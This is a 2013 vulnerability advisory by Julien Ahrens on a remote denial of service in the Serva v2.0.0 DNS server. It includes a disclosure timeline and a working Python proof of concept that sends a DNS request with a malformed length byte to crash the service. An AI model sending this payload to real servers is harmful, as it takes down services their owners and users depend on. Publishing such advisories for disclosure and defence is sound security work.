Get in touch

Serva v2.0.0 DNS Server Remote Denial of Service

Jan 14, 2013 · By Julien Ahrens

ADVISORY INFORMATION

  • Product: Serva
  • Vendor URL: https://www.vercot.com
  • CWE: Uncaught Exception [CWE-248]
  • Date found: 2012-07-08
  • Date published: 2013-01-14
  • CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
  • CVE: -

CREDITS

This vulnerability was discovered and researched by Julien Ahrens from Inshell Security.

VERSIONS AFFECTED

Serva 2.0.0, older versions may be affected too.

INTRODUCTION

N/A

VULNERABILITY DETAILS

Serva v2.0.0 suffers from a Remote Denial of Service Vulnerability in the DNS module.

The Query Name consists of multiple byte fields which contain the length of the subsequent part of the name query. The application does not properly validate the first length-field, which could lead to a stack corruption resulting in a remote denial of service condition.

An attacker needs to send a DNS request with a manipulated length-byte with a size greater than “\x7F” in the Query Name field to crash the application.

Since parts of the Tftpd32 v4.0 release are used in Serva, this bug was ported from the Tftpd32 v4.0 release too.

PROOF OF CONCEPT

#!/usr/bin/python

import socket

target="192.168.0.1"
port=53

TransACTID="\x03\xc3"
Flags="\x01\x00"
QuestionRRC="\x00\x01"
AnswerRRC="\x00\x00"
AuthRRC="\x00\x00"
AddRRC="\x00\x00"
QueryName="\xFF\x69\x6e\x73\x68\x65\x6c\x6c\x03\x6e\x65\x74\x00"
QueryType="\x00\x01"
QueryClass="\x00\x01"
payload = TransACTID + Flags + QuestionRRC + AnswerRRC +  AuthRRC +
AddRRC + QueryName + QueryType + QueryClass

print "[*] Connecting to Target " + target + "..."

s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)

print "[*] Sending malformed request..."

s.sendto(payload,(target,port))

print "[!] Exploit has been sent!\n"
s.close()

SOLUTION

None

REPORT TIMELINE

  • 2012-07-08: Initial notification sent to vendor
  • 2012-07-18: Vendor provides bugfix - release to verify that the vulnerability has been properly fixed
  • 2012-07-22: Inshell confirms that the bug has been fixed
  • 2012-08-29: Inshell asks vendor about the ETA of the planned release
  • 2012-08-29: Vendor states that the release takes a bit longer than expected
  • 2012-10-04: Inshell asks about ETA of the new release
  • 2012-10-04: Vendor states that there will be another delay because other features need to be added
  • 2012-11-17: Inshell asks about hotfix solution
  • 2012-11-18: Vendor states that there is no time for releasing a hotfix
  • 2013-01-13: Full Disclosure

REFERENCES